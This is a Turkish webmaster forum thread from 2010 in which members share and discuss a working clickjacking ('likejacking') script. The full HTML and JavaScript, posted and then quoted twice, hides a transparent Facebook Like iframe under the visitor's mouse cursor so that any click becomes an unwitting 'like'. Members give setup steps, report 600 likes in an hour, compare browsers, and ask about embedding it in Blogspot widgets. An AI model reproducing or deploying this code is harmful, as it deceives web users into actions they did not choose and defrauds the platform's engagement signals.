• 20-12-2010, 15:26:58
    #10
    evet diğer tarayıcılarda çalışmıyor bu
  • 20-12-2010, 15:31:14
    #11
    Konusu vardi zamanim olmadigi icin okuyamamistim, simdi baktim silinmis.
  • 20-12-2010, 19:39:33
    #12
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>SAYFA ADI</title>
    <script src="jquery-1.4.2.min.js" type="text/javascript"></script>
    <script type="text/javascript">
    var interval;
            $(function()
    {
        interval=setInterval("updateActiveElement();", 50);
    });
    
    function updateActiveElement()
    {
        if ( $(document.activeElement).attr('id')=="fbframe" )
        {
            clearInterval(interval);
            iflag=1;
        }    
    }      
    </script>
    </head>
    
    		
    
    <div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
    
    
    
         <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/sayfaadi
    &amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
    
    
            
    
        </div>
        
        
          <script>
        var iflag = 0;
        var icontainer = document.getElementById('icontainer');    
        var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
        
        
        
        function mouseFollower(e){
            /*                    DO NOT EDIT THIS                         */
        if (window.event)
        { // for IE
            icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
            icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
        }
        else
        {
            icontainer.style.top = (e.pageY-5)+'px';
            icontainer.style.left = (e.pageX-5)+'px';
        }
    
        }
        document.onmousemove = function(e) {
            if (iflag == 0) {mouseFollower(e);}
        }
    
        </script>
    
    </body>
    Buyrun sömürün
  • 20-12-2010, 19:43:37
    #13
    Üyeliği durduruldu
    Buriksi adlı üyeden alıntı: mesajı görüntüle
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>SAYFA ADI</title>
    <script src="jquery-1.4.2.min.js" type="text/javascript"></script>
    <script type="text/javascript">
    var interval;
            $(function()
    {
        interval=setInterval("updateActiveElement();", 50);
    });
    
    function updateActiveElement()
    {
        if ( $(document.activeElement).attr('id')=="fbframe" )
        {
            clearInterval(interval);
            iflag=1;
        }    
    }      
    </script>
    </head>
    
    		
    
    <div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
    
    
    
         <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/sayfaadi
    &amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
    
    
            
    
        </div>
        
        
          <script>
        var iflag = 0;
        var icontainer = document.getElementById('icontainer');    
        var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
        
        
        
        function mouseFollower(e){
            /*                    DO NOT EDIT THIS                         */
        if (window.event)
        { // for IE
            icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
            icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
        }
        else
        {
            icontainer.style.top = (e.pageY-5)+'px';
            icontainer.style.left = (e.pageX-5)+'px';
        }
    
        }
        document.onmousemove = function(e) {
            if (iflag == 0) {mouseFollower(e);}
        }
    
        </script>
    
    </body>
    Buyrun sömürün
    nasıl olcak kardeş bu biraz açıklarmısın ?
  • 20-12-2010, 19:46:03
    #14
    hocam kodu bir index olarak çalıştırmayı deneyin,daha sonra

    Alıntı
    <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/sayfaadi
    &amp;layout=standard&amp;show_faces=false&amp;widt h=450&amp;action=like&amp;font=tahoma&amp;colorsch eme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
    kırmızı renkle belirttiğim yere sayfa linkini yazınız bir deneyin bakalım.
  • 20-12-2010, 19:47:38
    #15
    Üyeliği durduruldu
    Buriksi adlı üyeden alıntı: mesajı görüntüle
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>SAYFA ADI</title>
    <script src="jquery-1.4.2.min.js" type="text/javascript"></script>
    <script type="text/javascript">
    var interval;
            $(function()
    {
        interval=setInterval("updateActiveElement();", 50);
    });
    
    function updateActiveElement()
    {
        if ( $(document.activeElement).attr('id')=="fbframe" )
        {
            clearInterval(interval);
            iflag=1;
        }    
    }      
    </script>
    </head>
    
    		
    
    <div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
    
    
    
         <iframe src="http://www.facebook.com/plugins/like.php?href=http://www.facebook.com/sayfaadi
    &amp;layout=standard&amp;show_faces=false&amp;width=450&amp;action=like&amp;font=tahoma&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
    
    
            
    
        </div>
        
        
          <script>
        var iflag = 0;
        var icontainer = document.getElementById('icontainer');    
        var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
        
        
        
        function mouseFollower(e){
            /*                    DO NOT EDIT THIS                         */
        if (window.event)
        { // for IE
            icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
            icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
        }
        else
        {
            icontainer.style.top = (e.pageY-5)+'px';
            icontainer.style.left = (e.pageX-5)+'px';
        }
    
        }
        document.onmousemove = function(e) {
            if (iflag == 0) {mouseFollower(e);}
        }
    
        </script>
    
    </body>
    Buyrun sömürün
    Buriksi adlı üyeden alıntı: mesajı görüntüle
    hocam kodu bir index olarak çalıştırmayı deneyin,daha sonra



    kırmızı renkle belirttiğim yere sayfa linkini yazınız bir deneyin bakalım.
    deniyen arkadaşlar olursa burdan yazzınlar olup olmadığını
  • 20-12-2010, 19:48:29
    #16
    Ben denedım hocam dun 1 saatde 600 kişi geldi
  • 20-12-2010, 19:57:33
    #17
    Buriksi adlı üyeden alıntı: mesajı görüntüle
    Ben denedım hocam dun 1 saatde 600 kişi geldi
    IE'da çalışıyor evet ama firefox'da çalışmadı maalesef
    Eline sağlık...
  • 20-12-2010, 19:59:48
    #18
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Arkadaşlar bunu blogspotta denesek widgeth olarak eklesek olurmu acaba?